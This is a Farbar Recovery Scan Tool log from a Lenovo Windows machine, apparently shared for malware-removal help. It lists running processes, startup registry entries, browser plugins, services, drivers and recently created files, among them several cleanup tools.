(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Lenovo Group Limited) C:\Program Files (x86)\ThinkPad\Utilities\SCHTASK.EXE
() C:\Program Files\Lenovo\Lenovo Mouse Suite\FSRremoS.EXE
(Primax Electronics Ltd.) C:\Program Files\Lenovo\Lenovo Mouse Suite\PELMICED.EXE
() C:\Program Files\Lenovo\Lenovo Mouse Suite\PelElvDm.exe
() C:\Program Files (x86)\Lenovo\Message Center Plus\MCPLaunch.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Daemon for Mouse Suite] => C:\Program Files\Lenovo\Lenovo Mouse Suite\ICO.EXE [99840 2010-07-29] (Primax Electronics Ltd.)
HKLM\...\Run: [LogMeIn GUI] => C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe [57928 2013-04-30] (LogMeIn, Inc.)
HKLM-x32\...\Run: [Power Manager Power Agenda] => C:\Program Files (x86)\ThinkPad\Utilities\DPMHost.EXE [75064 2010-07-28] ()
HKLM-x32\...\Run: [Lenovo Registration] => C:\Program Files (x86)\Lenovo Registration\LenovoReg.exe [4351712 2011-07-13] (Lenovo, Inc.)
HKLM-x32\...\Run: [D-Link D-Link DWA-125] => C:\Program Files (x86)\D-Link\DWA-125 revA\AirGCFG.exe [1024000 2010-05-21] (D-Link Corp.)
HKLM-x32\...\Run: [WZCSLDR2] => C:\Program Files (x86)\D-Link\DWA-125 revA\WZCSLDR2.exe [122880 2010-04-21] (Wireless Service)
HKLM-x32\...\Run: [Display] => C:\Program Files (x86)\APC\PowerChute Personal Edition\DataCollectionLauncher.exe [284024 2012-01-24] (Schneider Electric)
HKLM-x32\...\Run: [EaseUs Watch] => C:\Program Files (x86)\EaseUS\Todo Backup\bin\EuWatch.exe [70792 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd)
HKLM-x32\...\Run: [EaseUs Tray] => C:\Program Files (x86)\EaseUS\Todo Backup\bin\TrayNotify.exe [743560 2011-12-26] (CHENGDU YIWO Tech Development Co., Ltd)
HKLM-x32\...\Run: [AVG_UI] => C:\Program Files (x86)\AVG\AVG2015\avgui.exe [3593744 2014-09-05] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [vProt] => C:\Program Files (x86)\AVG Secure Search\vprot.exe [2640408 2014-08-26] ()
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1279120 2012-09-27] (CANON INC.)
HKLM-x32\...\Run: [IJNetworkScannerSelectorEX] => C:\Program Files (x86)\Canon\IJ Network Scanner Selector EX\CNMNSST.exe [452272 2012-08-31] (CANON INC.)
Winlogon\Notify\GoToAssist Express Customer: C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_winlogonx64.dll (Citrix Online, LLC)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-606911418-3109034106-3922174115-1000\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [427520 2009-07-13] (Microsoft Corporation)
HKU\S-1-5-21-606911418-3109034106-3922174115-1000\...\MountPoints2: {2fcf769b-1890-11e1-8ae0-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-606911418-3109034106-3922174115-1001\...\MountPoints2: {2fcf769b-1890-11e1-8ae0-806e6f6e6963} - Q:\LenovoQDrive.exe
HKU\S-1-5-21-606911418-3109034106-3922174115-500\...\MountPoints2: {2fcf769b-1890-11e1-8ae0-806e6f6e6963} - Q:\LenovoQDrive.exe
IFEO\ehshell.exe: [Debugger] "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe" -MceShellRedirect
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\APC UPS Status.lnk
ShortcutTarget: APC UPS Status.lnk -> C:\Program Files (x86)\APC\PowerChute Personal Edition\Display.exe (Schneider Electric)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com/webhp?rls=ig
SearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\addon64\ewpexbho.dll (CANON INC.)
BHO: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files (x86)\AVG\AVG2012\avgssiea.dll No File
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll No File
BHO-x32: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexbho.dll (CANON INC.)
BHO-x32: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files (x86)\AVG\AVG2012\avgssie.dll No File
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\addon64\ewpexhlp.dll (CANON INC.)
Toolbar: HKLM-x32 - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll No File
Toolbar: HKCU - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files (x86)\Canon\Easy-WebPrint EX\addon64\ewpexhlp.dll (CANON INC.)
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files (x86)\AVG\AVG2012\avgppa.dll No File
Handler-x32: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files (x86)\AVG\AVG2012\avgpp.dll No File
Handler-x32: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files (x86)\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.9\ViProtocol.dll (AVG Secure Search)
Tcpip\..\Interfaces\{145F6C64-D76C-4A66-8658-02D842AE2435}: [NameServer] 8.8.8.8,8.8.4.4

FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll No File
FF Plugin-x32: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files (x86)\Common Files\AVG Secure Search\SiteSafetyInstaller\18.1.9\\npsitesafety.dll No File
FF Plugin-x32: @canon.com/EPPEX -> C:\Program Files (x86)\Canon\My Image Garden\AddOn\CIG\npmigfpi.dll (CANON INC.)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [ndibdjnfmopecpmkdieinmbadjfpblof] - C:\ProgramData\AVG Secure Search\ChromeExt\18.1.0.443\avg.crx [2014-04-17]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 APC Data Service; C:\Program Files (x86)\APC\PowerChute Personal Edition\dataserv.exe [21880 2012-01-24] (Schneider Electric)
R2 APC UPS Service; C:\Program Files (x86)\APC\PowerChute Personal Edition\mainserv.exe [705912 2012-01-24] (Schneider Electric)
R2 AVGIDSAgent; C:\Program Files (x86)\AVG\AVG2015\avgidsagent.exe [3364368 2014-09-05] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files (x86)\AVG\AVG2015\avgwdsvc.exe [293448 2014-09-05] (AVG Technologies CZ, s.r.o.)
S2 D_Link_DWA-125; C:\Program Files (x86)\D-Link\DWA-125 revA\ANIWZCSdS.exe [126976 2010-04-21] (Wireless Service) [File not signed]
R2 D_Link_DWA-125_WPS; C:\Program Files (x86)\D-Link\DWA-125 revA\ANIWConnService.exe [53248 2010-03-03] () [File not signed]
R2 EaseUS Agent; C:\Program Files (x86)\EaseUS\Todo Backup\bin\Agent.exe [61064 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R2 GoToAssist Remote Support Customer; C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\758\g2ax_service.exe [610888 2014-09-25] (Citrix Online, LLC)
R2 Guard Agent; C:\Program Files (x86)\EaseUS\Todo Backup\bin\GuardAgent.exe [23176 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe [376144 2014-07-19] (LogMeIn, Inc.)
R2 LMIMaint; C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe [226640 2014-07-19] (LogMeIn, Inc.)
R2 LMS; C:\Program Files (x86)\Intel\AMT\LMS.exe [174616 2009-07-21] (Intel Corporation)
R2 LogMeIn; C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe [407424 2013-04-30] (LogMeIn, Inc.)
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation)
R2 PelService; C:\Program Files\Lenovo\Lenovo Mouse Suite\PelService.exe [177152 2010-04-22] () [File not signed]
R2 SUService; C:\Program Files (x86)\Lenovo\System Update\SUService.exe [28672 2011-07-25] (Lenovo Group Limited) [File not signed]
R2 ThinkVantage Registry Monitor Service; C:\Program Files (x86)\Common Files\Lenovo\tvt_reg_monitor_svc.exe [1019904 2009-08-28] (Lenovo Group Limited) [File not signed]
S3 TVT Backup Service; C:\Program Files (x86)\Lenovo\Rescue and Recovery\rrservice.exe [1475896 2010-07-29] (Lenovo Group Limited)
R2 UNS; C:\Program Files (x86)\Common Files\Intel\Privacy Icon\UNS\UNS.exe [2066968 2009-07-21] (Intel Corporation)
R2 vToolbarUpdater18.1.9; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe [1820184 2014-08-11] (AVG Secure Search)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 anodlwf; C:\Windows\System32\DRIVERS\anodlwfx.sys [15872 2009-03-06] ()
R1 Avgdiska; C:\Windows\System32\DRIVERS\avgdiska.sys [153368 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdrivera.sys [247576 2014-07-24] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHA; C:\Windows\System32\DRIVERS\avgidsha.sys [190744 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgldx64; C:\Windows\System32\DRIVERS\avgldx64.sys [243480 2014-08-20] (AVG Technologies CZ, s.r.o.)
R0 Avgloga; C:\Windows\System32\DRIVERS\avgloga.sys [313624 2014-07-18] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx64; C:\Windows\System32\DRIVERS\avgmfx64.sys [123672 2014-08-06] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx64; C:\Windows\System32\DRIVERS\avgrkx64.sys [31512 2014-06-18] (AVG Technologies CZ, s.r.o.)
R1 Avgtdia; C:\Windows\System32\DRIVERS\avgtdia.sys [270616 2014-07-02] (AVG Technologies CZ, s.r.o.)
R1 avgtp; C:\Windows\system32\drivers\avgtpx64.sys [50976 2014-08-11] (AVG Technologies)
R0 EUBAKUP; C:\Windows\System32\drivers\eubakup.sys [57480 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R0 EUBKMON; C:\Windows\System32\drivers\EUBKMON.sys [51336 2011-12-22] () [File not signed]
R1 EUDSKACS; C:\Windows\system32\drivers\eudskacs.sys [19592 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R1 EUFDDISK; C:\Windows\system32\drivers\EuFdDisk.sys [189576 2011-12-22] (CHENGDU YIWO Tech Development Co., Ltd) [File not signed]
R2 LMIInfo; C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [16056 2013-04-30] (LogMeIn, Inc.)
S4 LMIRfsClientNP; No ImagePath
R1 mbamchameleon; C:\Windows\system32\drivers\mbamchameleon.sys [93400 2014-10-01] (Malwarebytes Corporation)
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation)
R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-11-02] (Malwarebytes Corporation)
R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation)
S3 netr28ux; C:\Windows\System32\DRIVERS\Dnetr28ux.sys [1119072 2010-05-05] (Ralink Technology Corp.)
R3 pelmouse; C:\Windows\System32\DRIVERS\pelmouse.sys [23040 2010-10-20] (TPMX Electronics Ltd.)
R3 pelusblf; C:\Windows\System32\DRIVERS\pelusblf.sys [33280 2010-12-22] (TPMX Electronics Ltd.)
R1 Serial; C:\Windows\System32\DRIVERS\serial.sys [94208 2009-07-13] (Brother Industries Ltd.)
R3 TVTI2C; C:\Windows\System32\DRIVERS\Tvti2c.sys [41536 2009-07-02] (Lenovo (United States) Inc.)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-02 15:12 - 2014-11-02 15:12 - 00000000 ____D () C:\Users\Deborah\Downloads\FRST-OlderVersion
2014-10-31 06:49 - 2014-10-31 06:49 - 05591672 _____ (Swearware) C:\Users\Deborah\Downloads\ComboFix.exe
2014-10-31 06:33 - 2014-10-31 06:33 - 00018772 _____ () C:\Users\Deborah\Downloads\DDS.txt
2014-10-31 06:33 - 2014-10-31 06:33 - 00005354 _____ () C:\Users\Deborah\Downloads\Attach.txt
2014-10-31 06:32 - 2014-10-31 06:32 - 00018772 _____ () C:\Users\Deborah\Desktop\dds.txt
2014-10-31 06:32 - 2014-10-31 06:32 - 00005354 _____ () C:\Users\Deborah\Desktop\attach.txt
2014-10-31 06:18 - 2014-10-31 06:18 - 00688992 ____R (Swearware) C:\Users\Deborah\Downloads\dds.com
2014-10-31 05:55 - 2014-11-02 15:26 - 00028765 _____ () C:\Users\Deborah\Downloads\Addition.txt
2014-10-31 05:52 - 2014-11-02 22:15 - 00018872 _____ () C:\Users\Deborah\Downloads\FRST.txt
2014-10-31 05:50 - 2014-11-02 22:14 - 00000000 ____D () C:\FRST
2014-10-31 05:50 - 2014-11-02 15:12 - 02114560 _____ (Farbar) C:\Users\Deborah\Downloads\FRST64.exe
2014-10-31 05:27 - 2014-10-31 05:27 - 00000000 ____D () C:\ProgramData\Oracle
2014-10-31 05:25 - 2014-10-31 05:25 - 29458856 _____ (Oracle Corporation) C:\Users\Deborah\Downloads\jre-7u71-windows-i586.com
2014-10-31 05:24 - 2014-10-31 05:24 - 29727656 _____ (Oracle Corporation) C:\Users\Deborah\Downloads\jre-8u25-windows-i586.com
2014-10-31 04:59 - 2014-11-02 19:54 - 00028796 _____ () C:\Windows\PFRO.log
2014-10-31 04:15 - 2010-08-30 07:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll
2014-10-31 04:12 - 2014-10-31 04:16 - 00000000 ____D () C:\AdwCleaner
2014-10-30 20:00 - 2014-10-30 20:00 - 01375089 _____ () C:\Users\Deborah\Downloads\adwcleaner_3.311.exe
2014-10-29 15:01 - 2014-11-02 19:54 - 00000224 _____ () C:\Windows\setupact.log
2014-10-29 15:01 - 2014-10-29 15:01 - 00000000 _____ () C:\Windows\setuperr.log
2014-10-27 12:12 - 2014-10-27 12:12 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\Deborah\Downloads\tdsskiller.exe
2014-10-24 11:34 - 2014-11-02 20:20 - 00000000 ___HD () C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2014-10-22 09:46 - 2014-10-22 09:46 - 00000028 _____ () C:\Windows\SysWOW64\u
2014-10-21 09:54 - 2014-10-21 09:54 - 00000000 ____D () C:\Users\Deborah\AppData\Roaming\AVG2015
2014-10-21 09:51 - 2014-10-21 09:53 - 00000000 ____D () C:\ProgramData\AVG2015
2014-10-21 09:51 - 2014-10-21 09:51 - 00000000 ____D () C:\Users\Administrator\AppData\Local\Avg
2014-10-21 09:46 - 2014-10-21 09:59 - 00000000 ____D () C:\Users\Deborah\AppData\Local\Avg2015
2014-10-20 12:53 - 2014-10-20 12:53 - 00003856 _____ () C:\Windows\System32\Tasks\{BB0B37E5-22E3-2B40-FED2-DCC1CD9CCF9D}
2014-10-20 12:53 - 2014-10-20 12:53 - 00000000 _____ () C:\Windows\system32\qzmktxy.dll
2014-10-15 13:53 - 2014-10-09 21:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-15 13:53 - 2014-10-09 21:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-15 13:53 - 2014-09-28 19:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-15 13:53 - 2014-08-18 22:11 - 00693176 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2014-10-15 13:53 - 2014-08-18 22:10 - 00616352 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2014-10-15 13:53 - 2014-08-18 22:08 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2014-10-15 13:53 - 2014-08-18 22:08 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-15 13:53 - 2014-08-18 22:08 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2014-10-15 13:53 - 2014-08-18 22:07 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2014-10-15 13:53 - 2014-08-18 22:07 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2014-10-15 13:53 - 2014-08-18 22:07 - 00058880 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-15 13:53 - 2014-08-18 22:07 - 00032256 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-15 13:53 - 2014-08-18 22:07 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2014-10-15 13:53 - 2014-08-18 21:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2014-10-15 13:53 - 2014-08-18 21:41 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2014-10-15 13:53 - 2014-08-18 21:06 - 00061440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-15 13:53 - 2014-07-06 21:07 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-15 13:53 - 2014-07-06 21:07 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-15 13:53 - 2014-07-06 21:07 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 05551032 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-15 13:53 - 2014-07-06 21:06 - 04120576 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 01069056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00440832 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-15 13:53 - 2014-07-06 21:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-15 13:53 - 2014-07-06 21:06 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-15 13:53 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-15 13:53 - 2014-07-06 21:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-15 13:53 - 2014-07-06 21:05 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-15 13:53 - 2014-07-06 21:05 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-15 13:53 - 2014-07-06 21:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-15 13:53 - 2014-07-06 20:52 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-15 13:53 - 2014-07-06 20:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2014-10-15 13:53 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2014-10-15 13:53 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2014-10-15 13:53 - 2014-07-06 20:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2014-10-15 13:53 - 2014-07-06 20:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-10-15 13:53 - 2014-07-06 20:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-10-15 13:53 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2014-10-15 13:53 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
